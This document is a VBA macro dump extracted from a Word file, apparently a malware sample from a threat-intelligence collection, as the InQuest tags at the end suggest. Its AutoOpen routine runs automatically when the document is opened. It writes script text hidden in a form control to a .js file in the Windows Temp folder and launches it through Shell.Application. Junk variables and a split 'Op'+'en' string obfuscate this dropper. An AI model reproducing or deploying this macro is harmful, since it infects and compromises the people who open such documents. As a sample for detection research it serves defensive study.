Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim HrMhdVlWdwiHsSbpM_g As Integer
HrMhdVlWdwiHsSbpM_g = 3117

Dim RCKCftBTQ_cBvgLfTVLftKB As Integer
RCKCftBTQ_cBvgLfTVLftKB = -770
Dim ZzcwPizMnLaLF_WCRvfwP As String
ZzcwPizMnLaLF_WCRvfwP = "8139nkKBhLTpnKBKCghtjvZSQjpva"
  Open "C:\Windows\Temp\nZWpSSfNxBFvlnCrKiraLlBkzp.js" For Output As #1
    Print #1, dqbwidvx.Controls(0).ControlTipText
    Close #1
Dim aWiHzhWqPPzcRrZZLqRLxrfn As Integer
aWiHzhWqPPzcRrZZLqRLxrfn = 761

Dim xFkCFNZhrimdgBSzPhLTTQ As Integer
xFkCFNZhrimdgBSzPhLTTQ = -6895
Dim zLXNxXPKnHwNJlCgZVzJ As String
zLXNxXPKnHwNJlCgZVzJ = "4266rGTdLPTb_FfZkjRsCXwbV"
    Set LiNLDxslLatPQN = CreateObject("Shell.Application")
    
Dim nTBZKhSaXnbtMqkpTjhGH As Integer
nTBZKhSaXnbtMqkpTjhGH = 8670

Dim wbfFa_kimzwdxhZFf_cbgMSFkz As Integer
wbfFa_kimzwdxhZFf_cbgMSFkz = -6222
Dim cgXdjJztLZQdaa As String
cgXdjJztLZQdaa = "9485XnRBViFHRjcZcvrcJgfVztB"
    Set bXhaRZ_P_PfGrHRxwQMSNdaQihgLhCMJP = LiNLDxslLatPQN.NameSpace("C:\Windows\Temp")
    Set XwlnhsjRDcRrg_Z_WfRbBif = bXhaRZ_P_PfGrHRxwQMSNdaQihgLhCMJP.ParseName("nZWpSSfNxBFvlnCrKiraLlBkzp.js")
    XwlnhsjRDcRrg_Z_WfRbBif.InvokeVerb ("Op" + "en")
End Sub


Attribute VB_Name = "dqbwidvx"
Attribute VB_Base = "0{086A3A3E-4725-41CB-A627-4217C91C5A4F}{6C622667-8559-40F2-B91F-F4EC99ED61F3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "epxfuptbjti"
Attribute VB_Base = "0{E16ABE63-77A3-4660-9C1C-7C238763501E}{C323550A-9DC1-455B-A90C-8029EF744E6E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "otqbuyhoenp"
Attribute VB_Base = "0{4D804CB2-8B26-4F90-AE7C-3F797D401CB4}{ED8D65A1-337A-4176-8F0D-374E2D5F8199}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

' InQuest injected base64 decoded content
' 9^tAV!GF7

INQUEST-PP=macro
